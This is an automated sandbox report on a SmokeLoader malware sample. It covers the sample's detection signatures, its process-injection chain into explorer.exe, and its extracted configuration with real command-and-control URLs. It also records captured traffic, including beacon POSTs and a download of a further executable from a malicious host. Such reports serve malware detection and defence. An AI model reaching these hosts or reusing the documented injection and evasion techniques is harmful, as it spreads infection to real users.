Play interactive tour

Edit tour

Windows Analysis Report qhQ6armJ25.exe

Overview

General Information

Sample Name:	qhQ6armJ25.exe
Analysis ID:	528745
MD5:	9953acb0fee6c45fc5aa12d21ac3ad1b
SHA1:	afaf20c658c307f53e804639710c2dce09e9c3ba
SHA256:	5231916fbeb9c166a9bbb4e7c576b210019a3a84c17cbe777cb099ab3aad5dd8
Tags:	DofoilexeSmokeLoader
Infos:
Most interesting Screenshot:

Detection

SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Benign windows process drops PE files

Yara detected SmokeLoader

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Maps a DLL or memory area into another process

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Machine Learning detection for sample

Injects a PE file into a foreign processes

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Contains functionality to inject code into remote processes

Deletes itself after installation

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Creates a thread in another existing process (thread injection)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Checks if the current machine is a virtual machine (disk enumeration)

Uses 32bit PE files

Contains functionality to check if a debugger is running (IsDebuggerPresent)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Downloads executable code via HTTP

Creates a DirectInput object (often for capturing keystrokes)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

qhQ6armJ25.exe (PID: 7112 cmdline: "C:\Users\user\Desktop\qhQ6armJ25.exe" MD5: 9953ACB0FEE6C45FC5AA12D21AC3AD1B)

qhQ6armJ25.exe (PID: 7144 cmdline: "C:\Users\user\Desktop\qhQ6armJ25.exe" MD5: 9953ACB0FEE6C45FC5AA12D21AC3AD1B)

explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

D380.exe (PID: 6328 cmdline: C:\Users\user\AppData\Local\Temp\D380.exe MD5: 61BA8F1EDCD03481D6447E8EC34DC383)

D380.exe (PID: 5456 cmdline: C:\Users\user\AppData\Local\Temp\D380.exe MD5: 61BA8F1EDCD03481D6447E8EC34DC383)

gahfeaj (PID: 5032 cmdline: C:\Users\user\AppData\Roaming\gahfeaj MD5: 9953ACB0FEE6C45FC5AA12D21AC3AD1B)

gahfeaj (PID: 6344 cmdline: C:\Users\user\AppData\Roaming\gahfeaj MD5: 9953ACB0FEE6C45FC5AA12D21AC3AD1B)

cleanup

Malware Configuration

Threatname: SmokeLoader

{"C2 list": ["http://nalirou70.top/", "http://xacokuo80.top/"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.834313384.0000000000460000.00000004.00000001.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000001.00000002.765681019.0000000000640000.00000004.00000001.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000002.00000000.748566688.0000000004F01000.00000020.00020000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000005.00000002.834484758.00000000005A1000.00000004.00020000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000001.00000002.765917923.0000000002051000.00000004.00020000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000005.00000002.834313384.0000000000460000.00000004.00000001.sdmp

Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://nalirou70.top/", "http://xacokuo80.top/"]}

Multi AV Scanner detection for submitted file

Show sources

Source: qhQ6armJ25.exe

Virustotal: Detection: 45%

Perma Link

Antivirus detection for URL or domain

Show sources

Source: http://nalirou70.top/	Avira URL Cloud: Label: phishing
Source: http://privacytoolzfor-you7000.top/downloads/toolspab2.exe	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Show sources

Source: privacytoolzfor-you7000.top	Virustotal: Detection: 6%	Perma Link
Source: xacokuo80.top	Virustotal: Detection: 7%	Perma Link
Source: nalirou70.top	Virustotal: Detection: 10%	Perma Link
Source: http://xacokuo80.top/	Virustotal: Detection: 7%	Perma Link

Machine Learning detection for sample

Show sources

Source: qhQ6armJ25.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\gahfeaj	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\D380.exe	Joe Sandbox ML: detected

Source: qhQ6armJ25.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source:	Binary string: xd?#C:\kotofaru\tenexut.pdbP+C source: qhQ6armJ25.exe, gahfeaj.2.dr
Source:	Binary string: C:\loc vetudigalol\6_di.pdbP+C source: D380.exe, 00000004.00000000.800740573.0000000000401000.00000020.00020000.sdmp, D380.exe, 00000004.00000002.820427647.0000000000401000.00000020.00020000.sdmp, D380.exe, 00000006.00000000.817319243.0000000000401000.00000020.00020000.sdmp, D380.exe.2.dr
Source:	Binary string: C:\loc vetudigalol\6_di.pdb source: D380.exe, 00000004.00000000.800740573.0000000000401000.00000020.00020000.sdmp, D380.exe, 00000004.00000002.820427647.0000000000401000.00000020.00020000.sdmp, D380.exe, 00000006.00000000.817319243.0000000000401000.00000020.00020000.sdmp, D380.exe.2.dr
Source:	Binary string: C:\kotofaru\tenexut.pdb source: qhQ6armJ25.exe, gahfeaj.2.dr

Networking:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: nalirou70.top
Source: C:\Windows\explorer.exe	Domain query: privacytoolzfor-you7000.top
Source: C:\Windows\explorer.exe	Domain query: xacokuo80.top

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs: http://nalirou70.top/
Source: Malware configuration extractor	URLs: http://xacokuo80.top/

Source: Joe Sandbox View

ASN Name: RAPMSB-ASRU RAPMSB-ASRU

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 25 Nov 2021 17:24:50 GMTContent-Type: application/x-msdos-programContent-Length: 302592Connection: closeLast-Modified: Thu, 25 Nov 2021 17:24:01 GMTETag: "49e00-5d1a03d96f132"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b0 b4 92 23 f4 d5 fc 70 f4 d5 fc 70 f4 d5 fc 70 9b a3 57 70 dd d5 fc 70 9b a3 62 70 e5 d5 fc 70 9b a3 56 70 97 d5 fc 70 fd ad 6f 70 ff d5 fc 70 f4 d5 fd 70 03 d5 fc 70 9b a3 53 70 f5 d5 fc 70 9b a3 66 70 f5 d5 fc 70 9b a3 61 70 f5 d5 fc 70 52 69 63 68 f4 d5 fc 70 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 2a 7d 9d 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 08 03 00 00 b4 7c 01 00 00 00 00 20 7c 01 00 00 10 00 00 00 20 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 80 01 00 04 00 00 6b 2c 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 fe 02 00 78 00 00 00 00 70 7e 01 f8 67 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 7e 01 d4 17 00 00 20 14 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 7a 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 cc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 06 03 00 00 10 00 00 00 08 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c0 41 7b 01 00 20 03 00 00 14 00 00 00 0c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 67 00 00 00 70 7e 01 00 68 00 00 00 20 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 a8 14 01 00 00 e0 7e 01 00 16 01 00 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://edwxjxx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: xacokuo80.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kwcurllpj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 356Host: xacokuo80.top
Source: global traffic	HTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytoolzfor-you7000.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tpjfndspxp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 306Host: xacokuo80.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tpjfndspxp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 306Host: xacokuo80.topData Raw: 10 87 8a 95 6c 84 dc b4 cc 4b 0d 33 7b cf 90 8d 42 13 a8 37 d2 35 1f ed cf 9b db fe 88 a4 e0 84 1f b2 5a a5 1d 1a c5 e0 ec d9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 84 de 9e 66 5d 02 c9 a1 c1 64 5d dc cc 36 26 d3 5c 15 b2 01 6a 5c 14 07 e7 84 ce 30 cc b0 ae b5 3d 25 0d 30 1d be 6b 73 be 6e 00 63 62 97 66 e0 b8 67 ab 40 59 0e 6f 97 fc 77 29 7e b2 4f c1 96 77 61 fb e0 26 d2 56 0d 0a f9 29 cc 4f ad b9 ea ab 97 56 d4 22 82 28 2a 6c 5c 55 83 3d f7 b0 64 f9 f8 08 b9 9b 37 1f 15 be e3 e1 99 93 5d 6f b6 f5 80 bc b1 22 6a d9 9e dc f1 00 7c 14 6e 37 a8 b2 45 18 22 b9 f9 9b 25 99 7f 72 52 fc 51 43 bc 8e 1e c0 79 c4 3d c7 b3 36 77 c8 6f ed b0 95 49 97 de 45 26 d5 7a 3a b5 ba f8 c8 3f fc 8e 26 60 d2 7a 96 a4 79 42 fb be 60 a5 42 dc 55 54 0f 49 a2 fa 1d 5c 12 aa a1 3e 00 7b 47 1f 6c d6 d6 23 0d f4 60 fe 70 1a 03 b7 e6 44 69 47 9c 07 29 d9 50 d2 a2 e2 a2 54 8d cb e8 60 d8 2f 0d 66 Data Ascii: lK3{B75Zwmwu$f]d]6&\j\0=%0ksncbfg@Yow)~Owa&V)OV"(*l\U=d7]o"j\|n7E"%rRQCy=6woIE&z:?&`zyB`BUTI\>{Gl#`pDiG)PT`/f
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tpjfndspxp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 306Host: xacokuo80.topData Raw: 10 87 8a 95 6c 84 dc b4 cc 4b 0d 33 7b cf 90 8d 42 13 a8 37 d2 35 1f ed cf 9b db fe 88 a4 e0 84 1f b2 5a a5 1d 1a c5 e0 ec d9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 84 de 9e 66 5d 02 c9 a1 c1 64 5d dc cc 36 26 d3 5c 15 b2 01 6a 5c 14 07 e7 84 ce 30 cc b0 ae b5 3d 25 0d 30 1d be 6b 73 be 6e 00 63 62 97 66 e0 b8 67 ab 40 59 0e 6f 97 fc 77 29 7e b2 4f c1 96 77 61 fb e0 26 d2 56 0d 0a f9 29 cc 4f ad b9 ea ab 97 56 d4 22 82 28 2a 6c 5c 55 83 3d f7 b0 64 f9 f8 08 b9 9b 37 1f 15 be e3 e1 99 93 5d 6f b6 f5 80 bc b1 22 6a d9 9e dc f1 00 7c 14 6e 37 a8 b2 45 18 22 b9 f9 9b 25 99 7f 72 52 fc 51 43 bc 8e 1e c0 79 c4 3d c7 b3 36 77 c8 6f ed b0 95 49 97 de 45 26 d5 7a 3a b5 ba f8 c8 3f fc 8e 26 60 d2 7a 96 a4 79 42 fb be 60 a5 42 dc 55 54 0f 49 a2 fa 1d 5c 12 aa a1 3e 00 7b 47 1f 6c d6 d6 23 0d f4 60 fe 70 1a 03 b7 e6 44 69 47 9c 07 29 d9 50 d2 a2 e2 a2 54 8d cb e8 60 d8 2f 0d 66 Data Ascii: lK3{B75Zwmwu$f]d]6&\j\0=%0ksncbfg@Yow)~Owa&V)OV"(*l\U=d7]o"j\|n7E"%rRQCy=6woIE&z:?&`zyB`BUTI\>{Gl#`pDiG)PT`/f

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 25 Nov 2021 17:24:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f0 1d b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 25 Nov 2021 17:24:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 0b a2 13 cc 2f ae 59 4a c3 55 a1 b9 67 f4 25 45 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OOj/YJUg%EQAc}yc0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 25 Nov 2021 17:25:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 78 61 63 6f 6b 75 6f 38 30 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at xacokuo80.top Port 80</address></body></html>0

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://edwxjxx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: xacokuo80.top

Source: unknown

DNS traffic detected: queries for: nalirou70.top

Source: global traffic

HTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytoolzfor-you7000.top

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected SmokeLoader

Show sources

Source: Yara match	File source: 00000005.00000002.834313384.0000000000460000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.765681019.0000000000640000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.748566688.0000000004F01000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.834484758.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.765917923.0000000002051000.00000004.00020000.sdmp, type: MEMORY

Source: D380.exe, 00000004.00000002.820813732.0000000001F09000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: qhQ6armJ25.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Users\user\Desktop\qhQ6armJ25.exe	Code function: 1_2_00401813 Sleep,NtTerminateProcess,
Source: C:\Users\user\Desktop\qhQ6armJ25.exe	Code function: 1_2_00401842 Sleep,NtTerminateProcess,
Source: C:\Users\user\Desktop\qhQ6armJ25.exe	Code function: 1_2_00402052 NtQuerySystemInformation,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\qhQ6armJ25.exe	Code function: 1_2_00402403 NtEnumerateKey,NtEnumerateKey,
Source: C:\Users\user\Desktop\qhQ6armJ25.exe	Code function: 1_2_00401812 Sleep,NtTerminateProcess,
Source: C:\Users\user\Desktop\qhQ6armJ25.exe	Code function: 1_2_0040202C NtQuerySystemInformation,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\qhQ6armJ25.exe	Code function: 1_2_00401830 Sleep,NtTerminateProcess,
Source: C:\Users\user\Desktop\qhQ6armJ25.exe	Code function: 1_2_00401833 Sleep,NtTerminateProcess,
Source: C:\Users\user\Desktop\qhQ6armJ25.exe	Code function: 1_2_00401836 Sleep,NtTerminateProcess,
Source: C:\Users\user\Desktop\qhQ6armJ25.exe	Code function: 1_2_004023D9 NtEnumerateKey,
Source: C:\Users\user\Desktop\qhQ6armJ25.exe	Code function: 1_1_00402052 NtQuerySystemInformation,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\qhQ6armJ25.exe	Code function: 1_1_004023D9 NtEnumerateKey,
Source: C:\Users\user\Desktop\qhQ6armJ25.exe	Code function: 1_1_00402403 NtEnumerateKey,NtEnumerateKey,
Source: C:\Users\user\Desktop\qhQ6armJ25.exe	Code function: 1_1_0040202C NtQuerySystemInformation,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Local\Temp\D380.exe	Code function: 4_2_01D20110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
Source: C:\Users\user\AppData\Roaming\gahfeaj	Code function: 5_2_00401813 Sleep,NtTerminateProcess,
Source: C:\Users\user\AppData\Roaming\gahfeaj	Code function: 5_2_00401842 Sleep,NtTerminateProcess,
Source: C:\Users\user\AppData\Roaming\gahfeaj	Code function: 5_2_00402052 NtQuerySystemInformation,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\gahfeaj	Code function: 5_2_00402403 NtEnumerateKey,NtEnumerateKey,
Source: C:\Users\user\AppData\Roaming\gahfeaj	Code function: 5_2_00401812 Sleep,NtTerminateProcess,
Source: C:\Users\user\AppData\Roaming\gahfeaj	Code function: 5_2_0040202C NtQuerySystemInformation,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\gahfeaj	Code function: 5_2_00401830 Sleep,NtTerminateProcess,
Source: C:\Users\user\AppData\Roaming\gahfeaj	Code function: 5_2_00401833 Sleep,NtTerminateProcess,
Source: C:\Users\user\AppData\Roaming\gahfeaj	Code function: 5_2_00401836 Sleep,NtTerminateProcess,
Source: C:\Users\user\AppData\Roaming\gahfeaj	Code function: 5_2_004023D9 NtEnumerateKey,

Source: qhQ6armJ25.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: qhQ6armJ25.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: D380.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: D380.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: gahfeaj.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: gahfeaj.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: webio.dll
Source: C:\Windows\explorer.exe	Section loaded: mswsock.dll
Source: C:\Windows\explorer.exe	Section loaded: winnsi.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll

Source: qhQ6armJ25.exe

Virustotal: Detection: 45%

Source: qhQ6armJ25.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\qhQ6armJ25.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\qhQ6armJ25.exe "C:\Users\user\Desktop\qhQ6armJ25.exe"
Source: C:\Users\user\Desktop\qhQ6armJ25.exe	Process created: C:\Users\user\Desktop\qhQ6armJ25.exe "C:\Users\user\Desktop\qhQ6armJ25.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\gahfeaj C:\Users\user\AppData\Roaming\gahfeaj
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\D380.exe C:\Users\user\AppData\Local\Temp\D380.exe
Source: C:\Users\user\AppData\Roaming\gahfeaj	Process created: C:\Users\user\AppData\Roaming\gahfeaj C:\Users\user\AppData\Roaming\gahfeaj
Source: C:\Users\user\AppData\Local\Temp\D380.exe	Process created: C:\Users\user\AppData\Local\Temp\D380.exe C:\Users\user\AppData\Local\Temp\D380.exe
Source: C:\Users\user\Desktop\qhQ6armJ25.exe	Process created: C:\Users\user\Desktop\qhQ6armJ25.exe "C:\Users\user\Desktop\qhQ6armJ25.exe"
